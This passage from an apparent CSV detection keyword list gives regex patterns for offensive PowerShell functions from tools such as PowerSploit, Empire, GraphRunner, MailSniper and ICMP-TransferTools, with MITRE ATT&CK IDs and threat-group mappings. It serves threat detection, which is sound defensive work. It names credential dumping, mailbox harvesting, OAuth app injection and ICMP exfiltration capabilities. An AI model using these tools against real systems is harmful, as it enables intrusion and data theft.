APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell 
modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-FileTransferWMImplant*",".{0,1000}Invoke\-FileTransferWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-FodHelperBypass*",".{0,1000}Invoke\-FodHelperBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-FodHelperBypass*",".{0,1000}Invoke\-FodHelperBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ForgeUserAgent -Device *",".{0,1000}Invoke\-ForgeUserAgent\s\-Device\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-ForgeUserAgent*",".{0,1000}Invoke\-ForgeUserAgent.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*Invoke-Get-RBCD-Threaded*",".{0,1000}Invoke\-Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Get-RBCD-Threaded*",".{0,1000}Invoke\-Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-GlobalMailSearch*",".{0,1000}Invoke\-GlobalMailSearch.{0,1000}","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1595 T1114 T1590 T1591 T1114","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-GlobalMailSearch*",".{0,1000}Invoke\-GlobalMailSearch.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-GlobalO365MailSearch*",".{0,1000}Invoke\-GlobalO365MailSearch.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-GoFetch*",".{0,1000}Invoke\-GoFetch.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*Invoke-Gopher*",".{0,1000}Invoke\-Gopher.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-GPPPasswordCheck*",".{0,1000}Invoke\-GPPPasswordCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed 
primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-GPPPasswordCheck*",".{0,1000}Invoke\-GPPPasswordCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-GrabTheHash*",".{0,1000}Invoke\-GrabTheHash.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-GraphOpenInboxFinder -Tokens*",".{0,1000}Invoke\-GraphOpenInboxFinder\s\-Tokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-GraphOpenInboxFinder*",".{0,1000}Invoke\-GraphOpenInboxFinder.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Checks each user's inbox in a list to see if they are 
readable","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-GraphRecon*",".{0,1000}Invoke\-GraphRecon.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Performs general recon for org info user settings directory sync settings etc","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-GraphRunner*",".{0,1000}Invoke\-GraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Runs Invoke-GraphRecon - Get-AzureADUsers - Get-SecurityGroups - Invoke-DumpCAPS - Invoke-DumpApps - and then uses the default_detectors.json file to search with Invoke-SearchMailbox - Invoke-SearchSharePointAndOneDrive - and Invoke-SearchTeams.","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-Grouper2*",".{0,1000}Invoke\-Grouper2.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Grouper2*",".{0,1000}Invoke\-Grouper2.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" 
"*Invoke-Grouper3*",".{0,1000}Invoke\-Grouper3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Grouper3*",".{0,1000}Invoke\-Grouper3.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-HandleKatz*",".{0,1000}Invoke\-HandleKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-HandleKatz*",".{0,1000}Invoke\-HandleKatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Handlekatz*",".{0,1000}Invoke\-Handlekatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-HardenedUNCPathCheck*",".{0,1000}Invoke\-HardenedUNCPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-HijackableDllsCheck*",".{0,1000}Invoke\-HijackableDllsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-HijackableDllsCheck*",".{0,1000}Invoke\-HijackableDllsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-HiveDump*",".{0,1000}Invoke\-HiveDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-HiveNightmare.ps1*",".{0,1000}Invoke\-HiveNightmare\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration 
tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-HoneypotBuster*",".{0,1000}Invoke\-HoneypotBuster.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","1","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Invoke-HostEnum -*",".{0,1000}Invoke\-HostEnum\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*invoke-hostenum -*",".{0,1000}invoke\-hostenum\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-HostEnum*",".{0,1000}Invoke\-HostEnum.{0,1000}","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*Invoke-HostRecon*",".{0,1000}Invoke\-HostRecon.{0,1000}","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. 
It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","414","117","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" "*invoke-hostscan*",".{0,1000}invoke\-hostscan.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-HotFixVulnCheck*",".{0,1000}Invoke\-HotFixVulnCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-HTTPServer*",".{0,1000}Invoke\-HTTPServer.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","A basic web server to use for accessing the emailviewer that is output from Invoke-SearchMailbox","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" 
"*Invoke-IcmpDownload*",".{0,1000}Invoke\-IcmpDownload.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-IcmpDownload.ps1*",".{0,1000}Invoke\-IcmpDownload\.ps1.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-IcmpUpload.ps1*",".{0,1000}Invoke\-IcmpUpload\.ps1.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-ImmersiveFileReader*",".{0,1000}Invoke\-ImmersiveFileReader.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Open restricted files with the immersive reader","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-ImpersonateUser*",".{0,1000}Invoke\-ImpersonateUser.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-InjectGEvent*",".{0,1000}Invoke\-InjectGEvent.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-InjectGEventAPI*",".{0,1000}Invoke\-InjectGEventAPI.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-InjectOAuthApp -AppName *",".{0,1000}Invoke\-InjectOAuthApp\s\-AppName\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-InjectOAuthApp*",".{0,1000}Invoke\-InjectOAuthApp.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Injects an app registration into the tenant","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-InstalledProgramsCheck*",".{0,1000}Invoke\-InstalledProgramsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for 
